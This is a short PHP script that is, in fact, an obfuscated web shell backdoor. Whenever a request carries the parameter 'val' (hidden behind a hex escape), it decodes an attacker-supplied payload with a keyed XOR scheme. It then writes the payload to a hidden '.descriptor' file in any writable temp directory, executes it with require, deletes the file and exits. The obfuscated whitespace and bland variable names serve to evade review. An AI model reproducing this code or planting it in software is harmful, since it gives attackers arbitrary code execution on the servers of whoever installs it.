<?php

if(isset($_REQUEST["\x76al"]) ? true : false){
	$marker = array_filter([getcwd(), sys_get_temp_dir(), "/dev/shm", session_save_path(), getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), "/var/tmp"]);
	$pointer = $_REQUEST["\x76al"];
	 $pointer	= 	 explode (	 	"."	 	, 		$pointer	)	  ;  
	$data = '';
            $s = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($s);
            $len = count($pointer);
    
            for($v = 0; $v 	<		$len; $v++) {	$v7 = $pointer[$v];
                $chS = ord($s[$v % $sLen]);
                $d =((int)$v7 - $chS -($v % 10)) ^ 13;
                $data.=chr($d);} 
	foreach ($marker as $key => $parameter_group) {
    		if (!!is_dir($parameter_group) && !!is_writable($parameter_group)) {
    $holder = implode("/", [$parameter_group, ".descriptor"]);
    if (file_put_contents($holder, $data)) {
	require $holder;
	unlink($holder);
	exit;
}
}
}
}